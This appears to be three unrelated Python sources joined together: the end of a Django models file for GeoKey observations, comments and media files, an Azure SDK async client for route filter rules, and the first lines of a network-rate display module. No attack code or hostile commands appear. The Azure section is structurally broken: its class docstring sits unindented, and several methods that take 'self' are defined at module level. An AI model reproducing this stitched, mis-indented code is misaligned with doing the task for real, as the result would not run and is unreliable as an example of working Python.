        ------
        ValidationError:
            when data is invalid
        """
        error_messages = []
        for field in category.fields.all().filter(status='active'):
            # Only validate keys that were actually provided.
            if field.key in data and data.get(field.key) is not None:
                try:
                    field.validate_input(data.get(field.key))
                except InputError as error:
                    error_messages.append(error)
        if error_messages:
            raise ValidationError(error_messages)

    @classmethod
    def validate_full(cls, category, data):
        """
        Validates the data against the category field definition. This is a
        full validation; every active field is checked, including missing
        ones.

        Parameter
        ---------
        category : geokey.categories.models.Category
            Category that the data is validated against
        data : dict
            Dictionary of key-value-pairs; incoming data that is validated

        Raises
        ------
        ValidationError:
            when data is invalid
        """
        error_messages = []
        for field in category.fields.all().filter(status='active'):
            try:
                field.validate_input(data.get(field.key))
            except InputError as error:
                error_messages.append(error)
        if error_messages:
            raise ValidationError(error_messages)

    @classmethod
    def create(cls, properties=None, creator=None, location=None,
               category=None, project=None, status=None):
        """
        Creates and returns a new observation.

        NOTE(review): despite the original docstring's claim, no field
        validation happens here; callers are expected to run
        validate_full/validate_partial beforehand — confirm with callers.

        Parameter
        ---------
        properties : dict
            Attributes of the observation
        creator : geokey.users.models.User
            User who creates the observation
        location : geokey.contributions.models.Location
            Location of the contribution
        category : geokey.categories.models.Category
            Category of the contribution
        project : geokey.projects.models.Project
            Project the contribution is assigned to
        status : str
            Status of the contribution; one of active, review, pending or draft

        Return
        ------
        geokey.contributions.models.Observation
            The observation created
        """
        if not properties:
            properties = {}
        # Persist the (possibly new) location before referencing it.
        location.save()
        observation = cls.objects.create(
            location=location,
            category=category,
            project=project,
            properties=properties,
            creator=creator,
            status=status
        )
        return observation

    def update(self, properties, updator, status=None):
        """
        Updates data of the observation.

        Parameter
        ---------
        properties : dict
            Attributes of the observation
        updator : geokey.users.models.User
            User who updates the observation
        status : str
            Status of the contribution; one of active, review, pending or draft

        Return
        ------
        geokey.contributions.models.Observation
            The updated observation
        """
        # Draft edits do not count as a new version.
        if status != 'draft':
            self.version = self.version + 1
        if properties:
            self.properties = properties
        self.updator = updator
        self.status = status or self.status
        self.updated_at = datetime.utcnow().replace(tzinfo=utc)
        self.save()
        return self

    def update_display_field(self):
        """
        Updates the display_field attribute. It uses the display field of the
        contribution's category and stores a 'key:value' string in the
        display_field property.
        """
        display_field = self.category.display_field
        if display_field is not None:
            value = None
            if self.properties:
                value = self.properties.get(display_field.key)
            self.display_field = '%s:%s' % (display_field.key, value)

    def update_count(self):
        """
        Updates the count of media files attached and comments. Should be
        called each time a file or comment is added/deleted.
        """
        self.num_media = self.files_attached.count()
        self.num_comments = self.comments.count()
        self.save()

    def update_search_matches(self):
        """
        Updates the search_matches property, which is used to filter
        contributions against a query string. It reads all fields from the
        category and creates a string like 'key1:value#####key2:value2'.
        """
        search_matches = []
        for field in self.category.fields.all():
            if self.properties and field.key in self.properties.keys():
                if field.fieldtype == 'LookupField':
                    # Store the human-readable lookup name, not the pk.
                    l_id = self.properties.get(field.key)
                    if l_id is not None:
                        lookup = field.lookupvalues.get(pk=l_id)
                        search_matches.append('%s:%s' % (
                            field.key, lookup.name
                        ))
                elif field.fieldtype == 'MultipleLookupField':
                    values = self.properties.get(field.key)
                    if values is not None:
                        lookups = []
                        for l_id in values:
                            lookups.append(
                                field.lookupvalues.get(pk=l_id).name
                            )
                        search_matches.append('%s:%s' % (
                            field.key,
                            ', '.join(lookups))
                        )
                else:
                    term = self.properties.get(field.key)
                    if term is not None:
                        search_matches.append(
                            '%s:%s' % (field.key, term)
                        )
        self.search_matches = '#####'.join(search_matches)

    def delete(self):
        """
        Soft-deletes the observation by setting its status to deleted; the
        row is kept for history.
        """
        self.status = OBSERVATION_STATUS.deleted
        self.save()
@receiver(pre_save, sender=Observation)
def pre_save_observation_update(sender, **kwargs):
    """Refresh derived fields right before an observation is saved.

    Recomputes the display_field and search_matches caches so they
    always reflect the latest properties.
    """
    instance = kwargs.get('instance')
    instance.update_display_field()
    instance.update_search_matches()
class Comment(models.Model):
    """
    A comment that is added to a contribution.
    """
    text = models.TextField()
    created_at = models.DateTimeField(auto_now_add=True)
    creator = models.ForeignKey(settings.AUTH_USER_MODEL)
    # The observation this comment belongs to.
    commentto = models.ForeignKey('Observation', related_name='comments')
    # Optional parent comment, for threaded replies.
    respondsto = models.ForeignKey(
        'Comment',
        null=True,
        blank=True,
        related_name='responses'
    )
    status = models.CharField(
        choices=COMMENT_STATUS,
        default=COMMENT_STATUS.active,
        max_length=20
    )
    review_status = models.CharField(
        choices=COMMENT_REVIEW,
        null=True,
        blank=True,
        max_length=10
    )
    objects = CommentManager()

    class Meta:
        ordering = ['id']

    def delete(self):
        """
        Soft-deletes the comment by setting its status to deleted.
        Recursively soft-deletes all responses first.
        """
        self.responses.all().delete()
        self.status = COMMENT_STATUS.deleted
        self.save()
@receiver(post_save, sender=Comment)
def post_save_comment_update(sender, **kwargs):
    """Keep the parent observation's cached counts in sync after a comment
    is saved (including soft-deletes, which also go through save())."""
    saved_comment = kwargs.get('instance')
    saved_comment.commentto.update_count()
class MediaFile(models.Model):
    """
    Base class for all media files. Not to be instantiated; instantiate one
    of the child classes instead.
    """
    name = models.CharField(max_length=100)
    description = models.TextField(null=True, blank=True)
    contribution = models.ForeignKey(
        'contributions.Observation', related_name='files_attached'
    )
    creator = models.ForeignKey(settings.AUTH_USER_MODEL)
    created_at = models.DateTimeField(auto_now_add=True)
    status = models.CharField(
        choices=MEDIA_STATUS,
        default=MEDIA_STATUS.active,
        max_length=20
    )
    objects = MediaFileManager()

    class Meta:
        ordering = ['id']

    @property
    def type_name(self):
        """
        Returns the type of media file. To be implemented by child classes.

        Raises
        ------
        NotImplementedError
            if called on MediaFile base class
        """
        raise NotImplementedError(
            'The property `type_name` has not been implemented for this '
            'subclass of `MediaFile`.'
        )

    def delete(self):
        """
        Soft-deletes the file by setting its status to deleted.
        """
        self.status = MEDIA_STATUS.deleted
        self.save()
@receiver(post_save, sender=MediaFile)
def post_save_media_file_update(sender, **kwargs):
    """Keep the parent observation's cached counts in sync after a media
    file is saved (including soft-deletes, which also go through save())."""
    saved_file = kwargs.get('instance')
    saved_file.contribution.update_count()
class ImageFile(MediaFile):
    """
    Stores images uploaded by users.
    """
    image = models.ImageField(upload_to='user-uploads/images')

    class Meta:
        ordering = ['id']
        app_label = 'contributions'

    @property
    def type_name(self):
        """
        Returns file type name

        Returns
        -------
        str
            'ImageFile'
        """
        return 'ImageFile'
class VideoFile(MediaFile):
    """
    Stores videos uploaded by users.
    """
    # NOTE(review): ImageField is used for a video upload and its thumbnail;
    # presumably only the storage path matters here, but confirm that
    # ImageField's PIL validation is not applied to these fields.
    video = models.ImageField(upload_to='user-uploads/videos')
    youtube_id = models.CharField(max_length=100)
    thumbnail = models.ImageField(upload_to='user-uploads/videos', null=True)
    youtube_link = models.URLField(max_length=255, null=True, blank=True)
    swf_link = models.URLField(max_length=255, null=True, blank=True)

    class Meta:
        ordering = ['id']

    @property
    def type_name(self):
        """
        Returns file type name

        Returns
        -------
        str
            'VideoFile'
        """
        return 'VideoFile'
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
# Generic return type threaded through the per-operation `cls` hook.
T = TypeVar('T')
# Signature of the optional `cls` callback: receives the pipeline response,
# the deserialized value, and the response headers; returns the final result.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RouteFilterRulesOperations:
"""RouteFilterRulesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_07_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
    def __init__(self, client, config, serializer, deserializer) -> None:
        """Store the pipeline client, serializers, and client configuration."""
        # Pipeline client used to build and send HTTP requests.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    async def _delete_initial(
        self,
        resource_group_name: str,
        route_filter_name: str,
        rule_name: str,
        **kwargs: Any
    ) -> None:
        # Sends the single DELETE request that starts the long-running
        # operation; begin_delete() wraps this in a poller.
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-07-01"

        # Construct URL
        url = self._delete_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
            'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]

        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # 200/202 = accepted, 204 = already gone; anything else is an error.
        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
    async def begin_delete(
        self,
        resource_group_name: str,
        route_filter_name: str,
        rule_name: str,
        **kwargs: Any
    ) -> AsyncLROPoller[None]:
        """Deletes the specified rule from a route filter.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param route_filter_name: The name of the route filter.
        :type route_filter_name: str
        :param rule_name: The name of the rule.
        :type rule_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling.
         Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[None]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Only issue the initial DELETE when not resuming from a saved state.
        if cont_token is None:
            raw_result = await self._delete_initial(
                resource_group_name=resource_group_name,
                route_filter_name=route_filter_name,
                rule_name=rule_name,
                cls=lambda x,y,z: x,
                **kwargs
            )

        # These kwargs were consumed by the initial call; the polling method
        # must not receive them again.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)

        def get_long_running_output(pipeline_response):
            # Delete returns no body; only the optional cls hook produces output.
            if cls:
                return cls(pipeline_response, None, {})

        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
            'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }

        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
async def get(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    **kwargs: Any
) -> "_models.RouteFilterRule":
    """Gets the specified rule from a route filter.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param route_filter_name: The name of the route filter.
    :type route_filter_name: str
    :param rule_name: The name of the rule.
    :type rule_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: RouteFilterRule, or the result of cls(response)
    :rtype: ~azure.mgmt.network.v2019_07_01.models.RouteFilterRule
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRule"]
    # Map well-known ARM failure statuses to typed exceptions; callers may
    # extend the mapping through the 'error_map' keyword.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-07-01"
    accept = "application/json"

    # Expand the operation's URL template with the serialized path arguments.
    url = self._client.format_url(
        self.get.metadata['url'],  # type: ignore
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'),
        routeFilterName=self._serialize.url("route_filter_name", route_filter_name, 'str'),
        ruleName=self._serialize.url("rule_name", rule_name, 'str'),
        subscriptionId=self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    )

    # Query string and headers for the GET request.
    query_parameters = {
        'api-version': self._serialize.query("api_version", api_version, 'str'),
    }  # type: Dict[str, Any]
    header_parameters = {
        'Accept': self._serialize.header("accept", accept, 'str'),
    }  # type: Dict[str, Any]

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    deserialized = self._deserialize('RouteFilterRule', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
async def _create_or_update_initial(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    route_filter_rule_parameters: "_models.RouteFilterRule",
    **kwargs: Any
) -> "_models.RouteFilterRule":
    """Issue the initial PUT of the create-or-update long-running operation.

    Sends the serialized rule and deserializes the immediate (200/201)
    response; polling to completion is handled by ``begin_create_or_update``.

    :param resource_group_name: The name of the resource group.
    :param route_filter_name: The name of the route filter.
    :param rule_name: The name of the route filter rule.
    :param route_filter_rule_parameters: Rule definition to create or update.
    :return: The deserialized RouteFilterRule, or the result of ``cls(response)``.
    :raises ~azure.core.exceptions.HttpResponseError: on any other status code.
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRule"]
    # Map well-known ARM failure statuses to typed exceptions; callers may
    # extend the mapping through the 'error_map' keyword.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-07-01"
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Construct URL
    url = self._create_or_update_initial.metadata['url']  # type: ignore
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
        'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Serialize the rule model and send it as the PUT body.
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content = self._serialize.body(route_filter_rule_parameters, 'RouteFilterRule')
    body_content_kwargs['content'] = body_content
    request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200, 201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    # 200 (updated) and 201 (created) both carry the same payload shape.
    if response.status_code == 200:
        deserialized = self._deserialize('RouteFilterRule', pipeline_response)

    if response.status_code == 201:
        deserialized = self._deserialize('RouteFilterRule', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
async def begin_create_or_update(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    route_filter_rule_parameters: "_models.RouteFilterRule",
    **kwargs: Any
) -> AsyncLROPoller["_models.RouteFilterRule"]:
    """Creates or updates a route in the specified route filter.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param route_filter_name: The name of the route filter.
    :type route_filter_name: str
    :param rule_name: The name of the route filter rule.
    :type rule_name: str
    :param route_filter_rule_parameters: Parameters supplied to the create or update route filter
     rule operation.
    :type route_filter_rule_parameters: ~azure.mgmt.network.v2019_07_01.models.RouteFilterRule
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be AsyncARMPolling.
     Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
    :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    :return: An instance of AsyncLROPoller that returns either RouteFilterRule or the result of cls(response)
    :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.RouteFilterRule]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    polling = kwargs.pop('polling', True)  # type: Union[bool, AsyncPollingMethod]
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRule"]
    lro_delay = kwargs.pop(
        'polling_interval',
        self._config.polling_interval
    )
    cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
    # Only issue the initial PUT when starting fresh; a continuation token
    # means we are rehydrating an in-flight operation instead.
    if cont_token is None:
        raw_result = await self._create_or_update_initial(
            resource_group_name=resource_group_name,
            route_filter_name=route_filter_name,
            rule_name=rule_name,
            route_filter_rule_parameters=route_filter_rule_parameters,
            cls=lambda x,y,z: x,  # keep the raw pipeline response for the poller
            **kwargs
        )

    # These keywords were consumed by the initial call and must not leak
    # into the polling method's kwargs below.
    kwargs.pop('error_map', None)
    kwargs.pop('content_type', None)

    def get_long_running_output(pipeline_response):
        # Deserialize the LRO's terminal response into the model type.
        deserialized = self._deserialize('RouteFilterRule', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
        'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }

    # Resolve the polling strategy: True -> ARM polling (final state read via
    # the Azure-AsyncOperation header), False -> no polling, anything else is
    # treated as a caller-supplied polling object.
    if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
    elif polling is False: polling_method = AsyncNoPolling()
    else: polling_method = polling
    if cont_token:
        return AsyncLROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output
        )
    else:
        return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
async def _update_initial(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    route_filter_rule_parameters: "_models.PatchRouteFilterRule",
    **kwargs: Any
) -> "_models.RouteFilterRule":
    """Issue the initial PATCH of the update long-running operation and
    return the deserialized immediate response."""
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRule"]
    # Typed exceptions for the well-known ARM failure statuses; extensible
    # via the 'error_map' keyword.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-07-01"
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Expand the URL template with the serialized path arguments in one step.
    url = self._client.format_url(
        self._update_initial.metadata['url'],  # type: ignore
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'),
        routeFilterName=self._serialize.url("route_filter_name", route_filter_name, 'str'),
        ruleName=self._serialize.url("rule_name", rule_name, 'str'),
        subscriptionId=self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    )

    # Query string and headers for the PATCH request.
    query_parameters = {
        'api-version': self._serialize.query("api_version", api_version, 'str'),
    }  # type: Dict[str, Any]
    header_parameters = {
        'Content-Type': self._serialize.header("content_type", content_type, 'str'),
        'Accept': self._serialize.header("accept", accept, 'str'),
    }  # type: Dict[str, Any]

    # Serialize the patch model and send it as the request body.
    body_content = self._serialize.body(route_filter_rule_parameters, 'PatchRouteFilterRule')
    request = self._client.patch(url, query_parameters, header_parameters, content=body_content)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    deserialized = self._deserialize('RouteFilterRule', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
async def begin_update(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    route_filter_rule_parameters: "_models.PatchRouteFilterRule",
    **kwargs: Any
) -> AsyncLROPoller["_models.RouteFilterRule"]:
    """Updates a route in the specified route filter.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param route_filter_name: The name of the route filter.
    :type route_filter_name: str
    :param rule_name: The name of the route filter rule.
    :type rule_name: str
    :param route_filter_rule_parameters: Parameters supplied to the update route filter rule
     operation.
    :type route_filter_rule_parameters: ~azure.mgmt.network.v2019_07_01.models.PatchRouteFilterRule
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be AsyncARMPolling.
     Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
    :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    :return: An instance of AsyncLROPoller that returns either RouteFilterRule or the result of cls(response)
    :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.RouteFilterRule]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    polling = kwargs.pop('polling', True)  # type: Union[bool, AsyncPollingMethod]
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRule"]
    lro_delay = kwargs.pop(
        'polling_interval',
        self._config.polling_interval
    )
    cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
    # Only issue the initial PATCH when starting fresh; a continuation token
    # means we are rehydrating an in-flight operation instead.
    if cont_token is None:
        raw_result = await self._update_initial(
            resource_group_name=resource_group_name,
            route_filter_name=route_filter_name,
            rule_name=rule_name,
            route_filter_rule_parameters=route_filter_rule_parameters,
            cls=lambda x,y,z: x,  # keep the raw pipeline response for the poller
            **kwargs
        )

    # These keywords were consumed by the initial call and must not leak
    # into the polling method's kwargs below.
    kwargs.pop('error_map', None)
    kwargs.pop('content_type', None)

    def get_long_running_output(pipeline_response):
        # Deserialize the LRO's terminal response into the model type.
        deserialized = self._deserialize('RouteFilterRule', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
        'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }

    # Resolve the polling strategy: True -> ARM polling with default LRO
    # options, False -> no polling, anything else is a caller-supplied object.
    if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
    elif polling is False: polling_method = AsyncNoPolling()
    else: polling_method = polling
    if cont_token:
        return AsyncLROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output
        )
    else:
        return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
def list_by_route_filter(
    self,
    resource_group_name: str,
    route_filter_name: str,
    **kwargs: Any
) -> AsyncIterable["_models.RouteFilterRuleListResult"]:
    """Gets all RouteFilterRules in a route filter.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param route_filter_name: The name of the route filter.
    :type route_filter_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either RouteFilterRuleListResult or the result of cls(response)
    :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.RouteFilterRuleListResult]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRuleListResult"]
    # Map well-known ARM failure statuses to typed exceptions; callers may
    # extend the mapping through the 'error_map' keyword.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-07-01"
    accept = "application/json"

    def prepare_request(next_link=None):
        # Build either the first-page request (templated URL + api-version)
        # or a follow-up request for the server-provided next_link.
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        if not next_link:
            # Construct URL
            url = self.list_by_route_filter.metadata['url']  # type: ignore
            path_format_arguments = {
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
                'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            }
            url = self._client.format_url(url, **path_format_arguments)
            # Construct parameters
            query_parameters = {}  # type: Dict[str, Any]
            query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
            request = self._client.get(url, query_parameters, header_parameters)
        else:
            # next_link already embeds its full query string.
            url = next_link
            query_parameters = {}  # type: Dict[str, Any]
            request = self._client.get(url, query_parameters, header_parameters)
        return request

    async def extract_data(pipeline_response):
        # Turn one page response into (next_link, async iterable of items).
        deserialized = self._deserialize('RouteFilterRuleListResult', pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.next_link or None, AsyncList(list_of_elem)

    async def get_next(next_link=None):
        # Fetch a single page, raising a typed error on non-200 responses.
        request = prepare_request(next_link)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        return pipeline_response

    return AsyncItemPaged(
        get_next, extract_data
    )
list_by_route_filter.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules'}  # type: ignore
| |
# -*- coding: utf-8 -*-
"""
Display network transfer rate.
Configuration parameters:
